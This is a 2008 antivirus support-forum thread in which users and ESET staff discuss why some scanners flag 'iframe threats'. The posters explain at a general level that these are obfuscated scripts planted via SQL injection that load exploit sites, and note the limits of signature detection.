Iframe threats

Discussion in 'ESET NOD32 Antivirus' started by Whissi, Sep 25, 2008.

Thread Status:
Not open for further replies.
  1. Whissi

    Whissi Registered Member

    Joined:
    May 11, 2005
    Posts:
    51
    Location:
    Germany
    Hello,

    today I visited a website one a computer, with a different anti-virus program (no NOD32). I got an AV alert, the av products claims, that the site I wanted to visit, is containing a iframe threat.

    So I started to investigate that.

    I tried several scanners and the results a very different: Most of the scanners doesn't detect these kind of threats, but Sophos or G-DATA for example, are detecting threats.

    I would like to post a link to the virustotal.com results, where I uploaded such a saved html file, but I don't know if this is allowed.

    And here's my question:
    Why doesn't detect NOD32 these kind of threats (well, when you don't know the threat, you can't really discuss the problem, but it isn't allowed to post such an url...)? Am I not protected?

    I don't want to discuss the value of other av products, but I think Sophos is one of the big players - they detect it. Would you say Sophos makes more noise than necessary (false detection)?
     
  2. Marcos

    Marcos Eset Staff Account

    Joined:
    Nov 22, 2002
    Posts:
    14,374
    The fact that a website contains the <IFRAME> tag does not make it malicious. This is a normal html tag that is used on many websites and flagging it automatically as malicious would produce thousands and thousands of false positives.
     
  3. Whissi

    Whissi Registered Member

    Joined:
    May 11, 2005
    Posts:
    51
    Location:
    Germany
    No, you didn't understand me - it's not the iframe html tag.

    They just call it iframe-threats, here are some names:
    • HTML/Dldr.Iframe.G
    • HTML:Iframe-gen
    • HTML/Framer
    • HTML:Iframe-gen
    • HTML.Downloader.Iframe.G
    • Mal/Iframe-F
    • Script.Dldr.Iframe.G

    From Sophos I know, that these kind of threats are related to some SQL injections attacks... here are some blog entries from Sophos:
    http://www.sophos.com/security/blog/2007/08/547.html
    http://www.sophos.com/security/blog/2007/10/611.html
    http://www.sophos.com/security/blog/2007/09/580.html
    http://www.sophos.com/security/blog/2008/04/1329.html
     
    Last edited: Sep 25, 2008
  4. Kayracc

    Kayracc Registered Member

    Joined:
    Jul 5, 2008
    Posts:
    96
    Most usually these are SQL injections, they inject obfuscated javascript code which when deobfuscated is a IFRAME link to malicious websites(usually 4-5) which contain exploits to various vulnerbilities, realplayer, shockwave etc etc

    The reason some av's detect the iframe exploit is because they've seen the obfuscated javascript before and have added detection for that very script

    so if the script says xxxyyyxxx they simply add that for detection, however if the website inside the code changes, it then becomes xxyyyxxxx, and they will no longer alert until they get a copy of the new code to add(they may also have some heuristics involved but)

    Any AV even the worst ones should detect the exploits on the pages afterwords, so detecting the iframe isn't the most important thing in the world, but it helps

    -Brian
     
  5. Marcos

    Marcos Eset Staff Account

    Joined:
    Nov 22, 2002
    Posts:
    14,374
    It seems that detection depends on either an exact url in the iframe tag or the domain followed by an arbitrary page. It's nothing magic that couldn't be easily circumvented. The point is to detect malware that might be potentially downloaded from sites referred to by the iframe tag.
     
Thread Status:
Not open for further replies.